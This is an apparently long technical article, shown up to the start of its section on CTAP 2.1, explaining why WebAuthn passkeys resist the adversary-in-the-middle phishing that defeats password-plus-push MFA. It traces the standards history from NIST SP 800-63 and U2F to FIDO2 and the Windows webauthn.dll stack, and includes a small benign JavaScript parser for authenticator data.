**Password plus push-notification MFA is no longer a strong authenticator.** 2024-2026 adversary-in-the-middle phishing kits walk straight through it. WebAuthn and passkeys are strong -- but only if you score them against the right axes (phishing resistance, verifier-compromise resistance, replay/relay resistance, step-up, recovery), not the inherited know/have/are taxonomy. This article walks the five-axis criteria framework, the WebAuthn Level 3 plus CTAP 2.x protocol layer, and the Windows-specific stack: `webauthn.dll`, Windows Hello as the user-verification gesture, the Windows 11 24H2 third-party passkey provider plug-in model, hybrid transport from a phone, and the seven attestation conveyance formats. The thesis the article lands on: every passkey deployment in production is exactly as strong as the weakest path back into the account, and that path is universally weaker than the authentication ceremony itself.
&lt;h2&gt;1. Two factors, no security&lt;/h2&gt;
&lt;p&gt;A junior engineer at a mid-size firm types her Microsoft 365 credentials into what looks exactly like the real &lt;code&gt;login.microsoftonline&lt;/code&gt; page, approves the push notification on her phone, and an hour later the security team is reading her inbox -- because the attacker was, too. The kit is Tycoon 2FA, the technique is reverse-proxy adversary-in-the-middle, and the marketing claim that &quot;password plus MFA is two factors&quot; just lost to a commodity off-the-shelf service. The same class of phishing-as-a-service kit (Evilginx, Caffeine, EvilProxy, Tycoon 2FA) is the dominant phishing toolset in 2024-2026; the kit sits between the user and the real Microsoft login page, captures the credentials and the post-MFA session cookie in flight, and hands a live session to the attacker [@sekoia-tycoon-2fa].&lt;/p&gt;
&lt;p&gt;Replay the exact same attack against a colleague whose only authenticator is a WebAuthn passkey. The kit serves the look-alike page; the page hands the browser a WebAuthn &lt;code&gt;PublicKeyCredentialRequestOptions&lt;/code&gt; blob with a fresh challenge. The browser builds &lt;code&gt;clientDataJSON&lt;/code&gt; with &lt;code&gt;type: &quot;webauthn.get&quot;&lt;/code&gt;, the actual origin the user is on (the look-alike domain &lt;code&gt;login-microsoft0nline.example&lt;/code&gt;, protocol scheme included), and the challenge. The browser will not let the look-alike page claim Microsoft&apos;s real &lt;code&gt;rpId&lt;/code&gt; (the &lt;code&gt;rpId&lt;/code&gt; must be a registrable suffix of the actual origin), so the authenticator is queried for a credential scoped to the look-alike domain and finds nothing -- it never registered a passkey for that domain. There is no signature to relay. The kit gets bytes that the real Microsoft server will reject on the first verification step. Microsoft&apos;s own documentation puts it bluntly: passkeys &quot;use origin-bound public key cryptography, ensuring credentials can&apos;t be replayed or shared with malicious actors&quot; [@ms-entra-passwordless].&lt;/p&gt;
&lt;p&gt;The know/have/are taxonomy ranks these two ceremonies as the same. Password plus push is &quot;something you know&quot; plus &quot;something you have,&quot; and so is password plus a passkey on a YubiKey. The taxonomy predicts that both ceremonies are roughly twice as strong as one factor alone. The phishing kit demolishes one and bounces off the other. &lt;em&gt;The taxonomy is wrong.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The right question is not &quot;how many factors did the user produce?&quot; It is &quot;what does the attacker have to defeat?&quot; The know/have/are buckets group authenticators by what the user &lt;em&gt;feels&lt;/em&gt; they are producing. The criteria framework groups them by &lt;em&gt;what an attacker has to defeat&lt;/em&gt;. Only the second taxonomy predicts the outcome of a real-world attack. The phishing kit walks through password plus push because nothing in that ceremony binds the user&apos;s secret to a specific origin. It bounces off the passkey because the passkey signs over the origin the browser is actually on, and no amount of reverse proxying changes that string.&lt;/p&gt;
&lt;p&gt;If the taxonomy is wrong, what is the right one? That is the question §2 answers.&lt;/p&gt;
&lt;h2&gt;2. The criteria framework: five axes that actually predict outcomes&lt;/h2&gt;
&lt;p&gt;The replacement for know/have/are is a five-row table. The rows are &lt;em&gt;what an attacker has to defeat&lt;/em&gt;, not &lt;em&gt;what the user thinks they are producing&lt;/em&gt;. The spine of the table is taken from NIST SP 800-63-4 (final, August 2025) [@sp80063-4-final], NIST SP 800-63B-4 [@sp80063b4-html], the FIDO Alliance Authenticator Certification Levels [@fido-certification-levels], and the IETF channel-binding lineage that runs from RFC 5056 (Williams, November 2007) [@rfc5056] through RFC 9266 (Whited, July 2022) [@rfc9266].&lt;/p&gt;

An authenticator whose protocol prevents a relying party impersonator (an adversary-in-the-middle) from inducing the authenticator to release a usable credential value. NIST SP 800-63B-4 formalises the requirement as *verifier-impersonation resistance*. The practitioner formulation, courtesy of Yubico, is verbatim: an authenticator is phishing-resistant if it binds its output to a communication channel or a verifier name [@yubico-nist-guidance].
&lt;h3&gt;Axis 1: phishing resistance&lt;/h3&gt;
&lt;p&gt;The criterion: can a look-alike domain induce the user (or the user&apos;s authenticator) to release a credential value that the look-alike then replays to the real verifier? Password plus any unbound second factor (SMS-OTP, TOTP, push) fails the criterion -- the kit just forwards every value the user produces. WebAuthn passes it by construction: the authenticator signs over &lt;code&gt;clientDataJSON&lt;/code&gt;, which the &lt;em&gt;browser&lt;/em&gt; fills in with the actual origin the user is on, and the signature is computed jointly over a hash of the RP identifier derived from that origin. The RP refuses any signature whose RP-ID hash does not match the registered &lt;code&gt;rpId&lt;/code&gt;.&lt;/p&gt;

The mechanism by which WebAuthn enforces phishing resistance: the browser writes the user&apos;s actual origin into `clientDataJSON.origin`, the authenticator signs over the SHA-256 hash of the canonical RP identifier (`rpIdHash` in `authenticatorData`), and the relying party validates that `rpIdHash` matches the RP identifier under which the credential was registered. The cryptography is trivial. The value is in the binding.
&lt;p&gt;Microsoft&apos;s Entra documentation states the criterion verbatim: passkeys &quot;provide verifier impersonation resistance, which ensures an authenticator only releases secrets to the Relying Party (RP) the passkey was registered with and not an attacker pretending to be that RP&quot; [@ms-entra-passwordless].&lt;/p&gt;
&lt;h3&gt;Axis 2: verifier-compromise resistance&lt;/h3&gt;
&lt;p&gt;The criterion: if the relying party&apos;s authentication database is exfiltrated, can the attacker use the stolen material to log in? Passwords fail this criterion in the worst possible way -- a salted hash is replayable after offline cracking, and a billion-row password dump is the standard primary input to credential stuffing. The public-key model passes the criterion definitionally. The relying party stores only the credential&apos;s public key; no signature is ever made by the relying party. Even a complete database leak gives the attacker zero authenticators.&lt;/p&gt;
&lt;p&gt;This criterion is older than WebAuthn by half a century. Morris and Thompson&apos;s 1979 password paper made the verifier-compromise case for hashing passwords on a multi-user UNIX system [@morris-thompson-1979]; the WebAuthn move is the realisation that even bcrypt&apos;d password databases lose this criterion eventually, because the work factor that protects them today is one Moore&apos;s-law decade away from being trivial.&lt;/p&gt;
&lt;h3&gt;Axis 3: replay and relay resistance&lt;/h3&gt;
&lt;p&gt;The criterion: can an attacker who observes one successful authentication replay it later, or relay it to a different verifier? OTP-based ceremonies (HOTP [@rfc4226], TOTP [@rfc6238]) provide partial replay resistance via a per-instance counter or timestamp, but they offer almost no relay resistance: the AitM kit forwards the OTP through its proxy within the OTP&apos;s validity window.&lt;/p&gt;
&lt;p&gt;WebAuthn passes the criterion with three layered mechanisms. The first is a fresh challenge issued by the RP for every ceremony, which the authenticator signs over. The second is a per-credential signature counter included in &lt;code&gt;authenticatorData&lt;/code&gt;, monotonically increasing on each use (the relying party rejects any assertion whose counter is not strictly greater than the previous one, modulo the synced-passkey carve-out we will reach in §7). The third is channel binding -- the structurally correct answer to relay attacks, which sits at the TLS layer rather than the application layer.The IETF Token Binding stack (RFC 8471, RFC 8473, both October 2018) [@rfc8471] [@rfc8473] was the most ambitious attempt at the channel-binding criterion at the application layer. Both RFCs remain Proposed Standard at the IETF -- the datatracker history pages record no Historic reclassification event for either [@rfc8471-history] [@rfc8473-history] -- but Chromium removed support in version 70 in October 2018, the same month the RFCs were published, and no major browser has implemented them since [@wiki-token-binding]. The &lt;code&gt;clientDataJSON.tokenBinding&lt;/code&gt; field is therefore a no-op in 2026 production. WebAuthn solves the criterion above the channel by signing the origin into the assertion itself.&lt;/p&gt;
&lt;p&gt;The cleaner channel-binding answer is RFC 9266 &lt;code&gt;tls-exporter&lt;/code&gt; for TLS 1.3 (Whited, July 2022) [@rfc9266], which extends RFC 5056&apos;s channel-binding framework into the TLS 1.3 world -- but no major browser wires &lt;code&gt;tls-exporter&lt;/code&gt; into WebAuthn out of the box as of January 2026. The current WebAuthn deployment treats the origin string in &lt;code&gt;clientDataJSON&lt;/code&gt; as the primary channel binding, with HTTPS itself providing the underlying TLS guarantee.&lt;/p&gt;
&lt;h3&gt;Axis 4: step-up and session continuity&lt;/h3&gt;
&lt;p&gt;The criterion: can the relying party demand a &lt;em&gt;fresh&lt;/em&gt; authentication for a high-value action (transfer money, change password, invite a user), and can it tell the difference between a session that was authenticated with strong factors and one that was authenticated with weak factors? WebAuthn answers this with two flag bits in &lt;code&gt;authenticatorData&lt;/code&gt;. &lt;code&gt;UP&lt;/code&gt; (user present) is set when the authenticator detected a presence test -- a touch, a click, an NFC tap. &lt;code&gt;UV&lt;/code&gt; (user verified) is set when the authenticator additionally verified the user via PIN, biometric, or other gesture. A relying party that demands &lt;code&gt;userVerification: &quot;required&quot;&lt;/code&gt; can force &lt;code&gt;UV=1&lt;/code&gt; on the assertion; an RP that issues a fresh challenge for a high-value action gets a fresh signature tied to that challenge.&lt;/p&gt;
&lt;p&gt;Generic transactional confirmation -- &quot;sign a description of &lt;em&gt;this specific transaction&lt;/em&gt;&quot; -- was attempted in WebAuthn&apos;s earliest drafts via the &lt;code&gt;txAuthSimple&lt;/code&gt; and &lt;code&gt;txAuthGeneric&lt;/code&gt; extensions [@webauthn-fpwd]. Neither extension was ever implemented by browsers, and both are absent from the Level 3 specification surface as of January 2026 [@webauthn-l3-cr-dated]. The Secure Payment Confirmation flow in WebAuthn Level 3 [@webauthn-l3-cr] is the productised replacement for payment transactions; general transactional authorisation remains an open problem.&lt;/p&gt;
&lt;h3&gt;Axis 5: recovery and lifecycle&lt;/h3&gt;
&lt;p&gt;The heretical thesis: this is the only axis that matters in production, and it is the axis on which every modern platform still bottoms out at a single-factor primitive. We will foreshadow it here and land on it in §17. A passkey ceremony that scores AAL3 phishing-resistant at the authentication moment can be a single-factor SMS-OTP at the recovery moment -- and the &lt;em&gt;system&apos;s&lt;/em&gt; AAL is the recovery flow&apos;s AAL, not the authentication ceremony&apos;s. Microsoft&apos;s Entra documentation already flags account recovery as a load-bearing deployment cost: FIDO2 keys &quot;can increase costs for equipment, training, and helpdesk support -- especially when users lose their physical keys and need account recovery&quot; [@ms-entra-passwordless].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The single most predictive question about an authentication system is not &quot;what factor does the user produce at sign-in?&quot; but &quot;what factor produces the credential when the user has lost the original one?&quot; We come back to this in §17.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The criteria table as a spine&lt;/h3&gt;
&lt;p&gt;The five axes give the article its spine. Every later section fills in a row of the same five-column table. The columns are the strongest authenticators we have shipped: password, password plus SMS-OTP, password plus TOTP, password plus push with number matching, device-bound FIDO2 hardware key, synced passkey, and a hypothetical &quot;recovery-flow-aware&quot; composite. The criteria-aware ranking (§13) re-orders that table in a way the know/have/are taxonomy cannot.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The know/have/are taxonomy groups authenticators by what the user feels they are producing. The criteria framework groups them by what an attacker has to defeat. Only the second taxonomy predicts the outcome of a real-world attack.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If these are the right axes, when did we figure that out?&lt;/p&gt;
&lt;h2&gt;3. Where the taxonomy came from&lt;/h2&gt;
&lt;p&gt;The know/have/are taxonomy did not appear all at once. The 1970s and 1980s operating-systems literature already grouped authentication factors into &quot;something the user knows,&quot; &quot;something the user has,&quot; and &quot;something the user is&quot; -- it was a way of talking about the design space, not a regulatory criterion. The taxonomy entered U.S. federal procurement via the Department of Defense&apos;s &lt;em&gt;Trusted Computer System Evaluation Criteria&lt;/em&gt; in December 1985 -- the Orange Book, DOD 5200.28-STD [@wiki-orange-book] -- which required identification and authentication at every assurance class above D and made passwords the canonical &lt;em&gt;something you know&lt;/em&gt; in federal IT. The Orange Book did not invent the taxonomy; it codified it.&lt;/p&gt;
&lt;p&gt;Two decades later, in June 2004, NIST canonised the same taxonomy as the U.S. federal regulatory framework. NIST SP 800-63 &lt;em&gt;Electronic Authentication Guideline&lt;/em&gt; -- by William Burr, Donna Dodson, and W. Timothy Polk -- defined four assurance levels and tied each to a combination of authenticator categories that the levels could accept [@sp80063-2004-v1] [@sp80063-2004-pdf]. Burr&apos;s framework absorbed two decades of accumulated practice with hardware OTP tokens. The canonical commercial OTP product, RSA SecurID, had shipped in 1986 -- a key fob that produced a fresh code each minute using a built-in clock and a factory-encoded seed [@wiki-rsa-securid] -- and SP 800-63 explicitly accepted SecurID-class authenticators at the higher assurance levels. The four-level structure (later AAL1 through AAL3 in the post-2017 redesign) lasted through SP 800-63-1 (2011), -2 (2013), -3 (2017), and -4 (2025); every revision is recognisably the same shape [@nist-sp80063-3-final].The CSRC bibliographic page for the 2004 first edition renders the leading author as a blank entry preceded by a stray comma, an artefact of Burr&apos;s retirement from NIST after publication. The actual cover-page authorship is Burr, Dodson, and Polk -- the citation in the references list above uses the correct three-name form.&lt;/p&gt;
&lt;p&gt;In parallel, the cryptographic protocol literature was building the &lt;em&gt;criteria&lt;/em&gt; taxonomy that would eventually displace know/have/are. Bellcore&apos;s Neil Haller published RFC 1760 in February 1995 -- the S/KEY one-time password system, a Lamport hash chain that produced a fresh login secret each time and that an eavesdropper could not replay [@rfc1760]. Haller&apos;s text already says the technique was first suggested by Leslie Lamport, which makes 1995 the first IETF standardisation of replay-resistance as a design criterion. RFC 4226 (HOTP, December 2005) [@rfc4226] and RFC 6238 (TOTP, May 2011) [@rfc6238] generalised the same idea into the synchronised counter and time-based variants the world now calls &quot;authenticator app&quot; codes.&lt;/p&gt;
&lt;p&gt;The verifier-impersonation criterion got its first IETF expression in November 2007. Nico Williams&apos; RFC 5056 &lt;em&gt;On the Use of Channel Bindings to Secure Channels&lt;/em&gt; defined the concept that &quot;the two end-points of a secure channel at one network layer are the same as at a higher layer,&quot; and bound authentication at the higher layer to the channel at the lower layer [@rfc5056]. RFC 5056 was the protocol-literature acknowledgement that authentication needed to be tied to &lt;em&gt;something the network attacker could not change&lt;/em&gt; -- the channel itself, not just the user&apos;s typing.&lt;/p&gt;
&lt;p&gt;Kim Cameron&apos;s &lt;em&gt;The Laws of Identity&lt;/em&gt;, published on identityblog.com in May 2005, captured the same idea from a higher-level perspective. The seven Laws are a framework for federated identity on the open Internet; Laws 2 (&quot;minimal disclosure for a constrained use&quot;) and 4 (&quot;directed identity&quot;) are the conceptual ancestors of WebAuthn&apos;s &lt;em&gt;origin binding&lt;/em&gt; and &lt;em&gt;per-RP key pair&lt;/em&gt; design [@identityblog-laws]. Cameron was Microsoft&apos;s Chief Architect of Identity through this period, and the Laws shaped a generation of Microsoft thinking on identity. The Laws preceded the consortium that would actually ship the protocol by eight years.&lt;/p&gt;

The criteria framework was *available* in the literature by 2007: replay resistance from S/KEY (1995), channel binding from RFC 5056 (2007), origin binding from Cameron&apos;s Laws of Identity (2005). It did not displace know/have/are in regulatory documents until NIST SP 800-63-3 in 2017 (which introduced the &quot;phishing-resistant authenticator&quot; term) and SP 800-63-4 in 2025 (which made verifier-impersonation resistance a first-class criterion). Why the gap? The know/have/are taxonomy is *legible to procurement* -- it produces neat checkboxes. The criteria taxonomy is *cryptographically meaningful* but produces fewer neat checkboxes. Regulation prefers checkboxes until breach data forces a change.

gantt
    title Authentication standards lineage, 1985-2026
    dateFormat YYYY
    axisFormat %Y
    section Regulatory codification
    Orange Book DOD 5200.28-STD :1985, 5y
    NIST SP 800-63 v1 :2004, 7y
    NIST SP 800-63-3 (phishing-resistant) :2017, 8y
    NIST SP 800-63-4 final :2025, 2y
    section Criteria origin (IETF/W3C)
    RFC 1760 S/KEY :1995, 10y
    RFC 4226 HOTP :2005, 6y
    RFC 5056 Channel binding :2007, 4y
    RFC 6238 TOTP :2011, 7y
    RFC 8471 Token Binding :2018, 1y
    RFC 9266 tls-exporter :2022, 4y
    section Identity literature
    Cameron Laws of Identity :2005, 8y
    section FIDO and W3C
    FIDO Alliance launch :2013, 1y
    FIDO U2F 1.0 :2014, 5y
    WebAuthn FPWD :2016, 3y
    WebAuthn L1 + CTAP 2.0 :2019, 2y
    WebAuthn L2 + CTAP 2.1 :2021, 1y
    Passkey commitment May 2022 :2022, 1y
    WebAuthn L3 CR :2023, 3y
    CTAP 2.2 PS :2025, 1y
    section Windows
    Windows 10 1903 webauthn.dll :2019, 3y
    Windows 11 22H2 ECC :2022, 2y
    Windows 11 24H2 plug-in model :2024, 2y
&lt;p&gt;By 2007 the criteria framework was on paper. By 2013 there was a consortium for it: the FIDO Alliance launched on 12 February 2013 [@fido-launch-pdf], with six founding members [@wiki-fido-alliance]. Earlier identity-layer attempts -- Mozilla Persona / BrowserID, launched July 2011, with decommissioning announced January 2016 and the service shut down on 30 November 2016 [@wiki-mozilla-persona] -- had tried to build a browser-mediated identity layer at the HTTP level and failed to achieve traction. The FIDO consortium took a different bet: solve the authentication ceremony first, leave the identity-layer above it to OIDC and SAML. What happened first in a browser?&lt;/p&gt;
&lt;h2&gt;4. U2F: the first browser ceremony designed against phishing&lt;/h2&gt;
&lt;p&gt;December 2014. Yubico, Google, and NXP Semiconductors publish FIDO 1.0 / Universal 2nd Factor (U2F) [@fido-u2f-overview]; U2F 1.0 reached Proposed Standard status on 9 October 2014, with the broader FIDO 1.0 announcement window running through December [@wiki-u2f]. The Universal 2nd Factor Wikipedia article catalogues the design tradeoffs explicitly: U2F&apos;s challenge-response is &quot;signed (encoding originating domain/website) to prevent interception and reuse&quot; [@wiki-u2f]. This was the first time a browser ceremony was designed against the phishing-resistance criterion as a &lt;em&gt;primary&lt;/em&gt; goal rather than as an afterthought.&lt;/p&gt;
&lt;p&gt;The U2F ceremony has five field-level moving parts. An &lt;em&gt;AppID&lt;/em&gt; string identifies the relying party, derived from the page&apos;s origin so a phisher&apos;s domain cannot produce a U2F signature for the real bank. A &lt;em&gt;challenge&lt;/em&gt; is a per-ceremony nonce the relying party generates. A &lt;em&gt;key handle&lt;/em&gt; is an opaque blob the authenticator returns at registration and supplies on every later assertion; the relying party uses it to address the right credential on the next challenge. A &lt;em&gt;signature counter&lt;/em&gt; increments monotonically on every assertion, letting the relying party detect simple cloning. And the &lt;em&gt;signature&lt;/em&gt; itself is an ECDSA P-256 signature over the AppID hash, the challenge, the counter, and a presence flag.&lt;/p&gt;
&lt;p&gt;The AppID rule is the load-bearing piece. The browser computes the AppID from the actual origin the user is on; the authenticator signs over its hash; the relying party compares it to the AppID under which the credential was registered. A look-alike domain produces a different AppID, which produces a different signature, which the real verifier rejects. This is the same trick WebAuthn will later generalise as &lt;code&gt;rpId&lt;/code&gt; binding -- and it is the trick that makes U2F structurally immune to the AitM kits that will demolish password plus push a decade later.&lt;/p&gt;
&lt;p&gt;The canonical deployment paper is &lt;em&gt;Security Keys: Practical Cryptographic Second Factors for the Modern Web&lt;/em&gt;, by Juan Lang, Alexei Czeskis, Dirk Balfanz, Marius Schilder, and Sampath Srinivas, in the Financial Cryptography 2016 preproceedings [@lang-fc2016-pdf]. The paper documents Google&apos;s internal rollout: a hardware second factor for every employee, replacing the company&apos;s previous OTP-based MFA. The empirical scoreboard for the criteria framework gets its first data point here -- after the rollout, Google reported zero phishing-related account takeovers on employee accounts during the deployment period. This is not a controlled study; it is the largest natural experiment in deployed phishing resistance the industry had seen.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; U2F is the moment the authentication community made a structural design choice: phishing resistance is a property of the &lt;em&gt;protocol&lt;/em&gt;, not of &lt;em&gt;user training&lt;/em&gt;. No amount of &quot;look for the lock icon&quot; advice closes the phishing gap; a protocol that signs over the origin closes it by construction.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;U2F&apos;s limitation is that it is, by design, a &lt;em&gt;second&lt;/em&gt; factor. The password under it remains the load-bearing weak link: a credential-stuffer can reuse the password against a service that does not require U2F, and a phisher can still capture the password even if they cannot capture the U2F signature. The AppID idea was correct; what was missing was the willingness to make the strong factor &lt;em&gt;the&lt;/em&gt; factor, not a layer on top of a weak one. The bridge from U2F to FIDO2 is exactly that move.&lt;/p&gt;
&lt;p&gt;The other piece U2F got right and FIDO2 inherited is the principle that the credential is &lt;em&gt;device-bound&lt;/em&gt; by default. The U2F Wikipedia summary captures the consequence: &quot;no recovery of the key is possible&quot; if the device is lost [@wiki-u2f]. This is the same property that makes synced passkeys, when they arrive in May 2022, a &lt;em&gt;productisation&lt;/em&gt; rather than a &lt;em&gt;cryptographic&lt;/em&gt; move. The bytes are the same. The lifecycle is different.&lt;/p&gt;
&lt;p&gt;If the second factor is doing all the work, why not make it &lt;em&gt;the&lt;/em&gt; factor?&lt;/p&gt;
&lt;h2&gt;5. FIDO2 + CTAP 2.0 + WebAuthn Level 1: the spec lands&lt;/h2&gt;
&lt;p&gt;March 4, 2019. The World Wide Web Consortium and the FIDO Alliance announced that the Web Authentication specification was an official W3C Recommendation [@w3c-fido-press-release]; the dated Recommendation slug is &lt;code&gt;REC-webauthn-1-20190304&lt;/code&gt; [@webauthn-l1-rec]. Same day, with January 30, 2019 as the underlying CTAP 2.0 Proposed Standard date [@ctap-2-0-ps]. The pair is what the industry markets as &lt;em&gt;FIDO2&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;The reframe was decisive. A &lt;em&gt;platform authenticator&lt;/em&gt; -- Windows Hello on Windows, Touch ID on macOS, the Android Keystore on Android -- was now a first-class FIDO authenticator. The user&apos;s laptop or phone could be the authenticator. The browser did not need a separate USB device; it could call into the OS instead. This is the move that made FIDO2 a consumer technology, not just a security-team technology.&lt;/p&gt;

The *relying party* is the web service that owns the user&apos;s account. The *rpId* is a string identifying that party for credential scoping; it must be a registrable suffix of the page&apos;s origin (so `login.bank.com` may use `bank.com` as its `rpId`, but `evil.com` may not). All WebAuthn signatures cover the SHA-256 hash of the `rpId` (`rpIdHash`), which the authenticator places in `authenticatorData`; the browser separately records the actual origin in `clientDataJSON` and enforces that the `rpId` is a registrable suffix of that origin. The relying party validates the signature against the public key registered for that `rpId`. Phishing resistance is `rpId` binding, full stop [@webauthn-l3-cr].
&lt;p&gt;The Web IDL surface that WebAuthn Level 1 standardised is small. &lt;code&gt;navigator.credentials.create({publicKey: ...})&lt;/code&gt; registers a new credential; &lt;code&gt;navigator.credentials.get({publicKey: ...})&lt;/code&gt; produces an assertion. Both return &lt;code&gt;PublicKeyCredential&lt;/code&gt; objects. The complexity is not in the API; it is in the byte-level structures the API exchanges.&lt;/p&gt;
&lt;p&gt;A registration ceremony looks like this. The relying party generates a &lt;code&gt;PublicKeyCredentialCreationOptions&lt;/code&gt; blob containing a fresh challenge, the &lt;code&gt;rpId&lt;/code&gt;, the user&apos;s account identifier, the list of algorithms the RP supports, the desired user verification, and an optional list of credentials the user already has. The browser passes this to the authenticator and gets back two byte blobs. The first is &lt;code&gt;clientDataJSON&lt;/code&gt; -- a UTF-8 JSON blob containing &lt;code&gt;type: &quot;webauthn.create&quot;&lt;/code&gt;, the origin the browser was actually on, and the challenge. The second is &lt;code&gt;authenticatorData&lt;/code&gt; -- a binary blob containing the &lt;code&gt;rpIdHash&lt;/code&gt; (SHA-256 of the canonical &lt;code&gt;rpId&lt;/code&gt;), the flags byte (with &lt;code&gt;UP&lt;/code&gt;, &lt;code&gt;UV&lt;/code&gt;, &lt;code&gt;AT&lt;/code&gt;, &lt;code&gt;ED&lt;/code&gt; bits), the signature counter (initially zero, sometimes non-zero), the new credential&apos;s identifier, the AAGUID identifying the authenticator model, and the credential&apos;s public key in COSE_Key format. An optional &lt;em&gt;attestation statement&lt;/em&gt; binds those bytes to a hardware root of trust.&lt;/p&gt;

A 16-byte identifier the authenticator includes in `authenticatorData` to identify its make and model. Some authenticators emit an all-zeros AAGUID for privacy. Microsoft&apos;s Entra ID hardware-vendor matrix lists dozens of FIDO2 keys with their AAGUIDs and supported transports [@ms-entra-fido2-hardware]; the FIDO Metadata Service is the authoritative directory.

sequenceDiagram
    participant U as User
    participant B as Browser
    participant A as Authenticator
    participant R as Relying Party
    R-&amp;gt;&amp;gt;B: PublicKeyCredentialCreationOptions {challenge, rpId, user, pubKeyAlgs}
    B-&amp;gt;&amp;gt;B: build clientDataJSON {type:create, origin, challenge}
    B-&amp;gt;&amp;gt;A: authenticatorMakeCredential(clientDataHash, rpId, user, ...)
    A-&amp;gt;&amp;gt;U: prompt for user gesture (UV)
    U-&amp;gt;&amp;gt;A: present gesture (PIN, fingerprint, face)
    A-&amp;gt;&amp;gt;A: generate (pubKey, privKey) and sign attestation
    A-&amp;gt;&amp;gt;B: clientDataJSON, authenticatorData, attestationStatement
    B-&amp;gt;&amp;gt;R: attestationResponse {clientDataJSON, attestationObject}
    R-&amp;gt;&amp;gt;R: verify origin, rpIdHash, signature, then store pubKey, credentialId
    R-&amp;gt;&amp;gt;U: account created
&lt;p&gt;An authentication ceremony is the same shape with one structural change: the RP supplies &lt;code&gt;PublicKeyCredentialRequestOptions&lt;/code&gt; with a fresh challenge, the authenticator finds the credential matching the &lt;code&gt;rpId&lt;/code&gt;, prompts the user for a gesture (if &lt;code&gt;userVerification&lt;/code&gt; is requested), and produces an &lt;em&gt;assertion&lt;/em&gt; -- a signature over &lt;code&gt;authenticatorData || SHA-256(clientDataJSON)&lt;/code&gt; with the credential&apos;s private key. The relying party verifies the signature against the stored public key.&lt;/p&gt;
&lt;p&gt;The Windows-side surface debuts in the same window. Microsoft Learn states verbatim that Microsoft &quot;introduced the W3C/Fast IDentity Online 2 (FIDO2) Win32 WebAuthn platform APIs in Windows 10 (version 1903)&quot; [@ms-learn-webauthn-apis]. May 2019. &lt;code&gt;webauthn.dll&lt;/code&gt; ships. From that moment on, every browser on Windows -- Edge, Chrome, Firefox, Brave -- talks WebAuthn through one Win32 surface. The Microsoft Learn passkey overview makes the underlying architecture explicit: &quot;When these APIs are in use, Windows 10 browsers or applications don&apos;t have direct access to the FIDO2 transports for FIDO-related messaging&quot; [@ms-learn-webauthn-apis]. The OS is the dispatcher.&lt;/p&gt;
&lt;p&gt;The W3C/FIDO press release named the launch implementations: Windows 10, Android, Chrome, Firefox, Edge, and Safari (in preview) [@w3c-fido-press-release]. Microsoft, Google, Mozilla, and Apple all shipped within the same year. WebAuthn became the most-implemented strong-authentication standard on the consumer web inside eighteen months.&lt;/p&gt;
&lt;p&gt;{`
// A reader can paste in their own clientDataJSON and authenticatorData
// (base64url-encoded as Microsoft returns them) to see how the parser
// walks the bytes. Origin binding is one SHA-256 invocation away from
// being a one-liner; the value is in the binding, not the cryptography.&lt;/p&gt;
&lt;p&gt;const clientDataB64 = &quot;eyJ0eXBlIjoid2ViYXV0aG4uZ2V0Iiwib3JpZ2luIjoiaHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tIiwiY2hhbGxlbmdlIjoiUk5KU2V6NjFqdyJ9&quot;;
const authDataB64 = &quot;Y9JZsAcVeQOLgxs9Ux7QYZpyTaB-OkpdyPwQk7P9YsoFAAAAFw&quot;;&lt;/p&gt;
&lt;p&gt;function b64urlDecode(s) {
  s = s.replace(/-/g,&apos;+&apos;).replace(/_/g,&apos;/&apos;);
  while (s.length % 4) s += &apos;=&apos;;
  return Uint8Array.from(atob(s), c =&amp;gt; c.charCodeAt(0));
}&lt;/p&gt;
&lt;p&gt;const clientDataBytes = b64urlDecode(clientDataB64);
const clientData = JSON.parse(new TextDecoder().decode(clientDataBytes));
console.log(&quot;clientDataJSON.type     =&quot;, clientData.type);
console.log(&quot;clientDataJSON.origin   =&quot;, clientData.origin);
console.log(&quot;clientDataJSON.challenge=&quot;, clientData.challenge);&lt;/p&gt;
&lt;p&gt;const authData = b64urlDecode(authDataB64);
const rpIdHash = authData.slice(0, 32);
const flags = authData[32];
const signCount = (authData[33]&amp;lt;&amp;lt;24) | (authData[34]&amp;lt;&amp;lt;16) | (authData[35]&amp;lt;&amp;lt;8) | authData[36];
console.log(&quot;authenticatorData rpIdHash =&quot;, Array.from(rpIdHash).map(b=&amp;gt;b.toString(16).padStart(2,&apos;0&apos;)).join(&apos;&apos;));
console.log(&quot;authenticatorData flags    = 0x&quot; + flags.toString(16),
            &quot;UP=&quot;+(flags&amp;amp;1), &quot;UV=&quot;+((flags&amp;gt;&amp;gt;2)&amp;amp;1), &quot;BE=&quot;+((flags&amp;gt;&amp;gt;3)&amp;amp;1), &quot;BS=&quot;+((flags&amp;gt;&amp;gt;4)&amp;amp;1), &quot;AT=&quot;+((flags&amp;gt;&amp;gt;6)&amp;amp;1));
console.log(&quot;authenticatorData signCount=&quot;, signCount);
`}&lt;/p&gt;
&lt;p&gt;The credential&apos;s public key is encoded as a COSE_Key map -- a CBOR object whose algorithm identifier is one of the entries in the IANA COSE Algorithms registry [@iana-cose-registry]. As of the registry&apos;s 2026-03-04 update, no post-quantum algorithm is in WebAuthn-recommended status; ECDSA P-256 and EdDSA Ed25519 remain the workhorses. The companion &lt;em&gt;Post-Quantum Cryptography on Windows&lt;/em&gt; article walks the algorithm-side rollout.&lt;/p&gt;
&lt;p&gt;Level 1 settled the field-level shape. What did the next two years sharpen?&lt;/p&gt;
&lt;h2&gt;6. CTAP 2.1: the wire protocol every security key is speaking&lt;/h2&gt;
&lt;p&gt;15 June 2021. The FIDO Alliance published CTAP 2.1 as a Proposed Standard [@ctap-2-1-ps]. CTAP 2.1 is the CBOR-on-the-wire version most security keys in 2024-2026 are running; CTAP 2.2 (Proposed Standard, 14 July 2025) [@ctap-2-2-ps] refines a few corners, and CTAP 2.3 followed as a Proposed Standard on 26 February 2026 [@fido-specs-download]. Each version adds capability without breaking the previous one&apos;s commands.&lt;/p&gt;

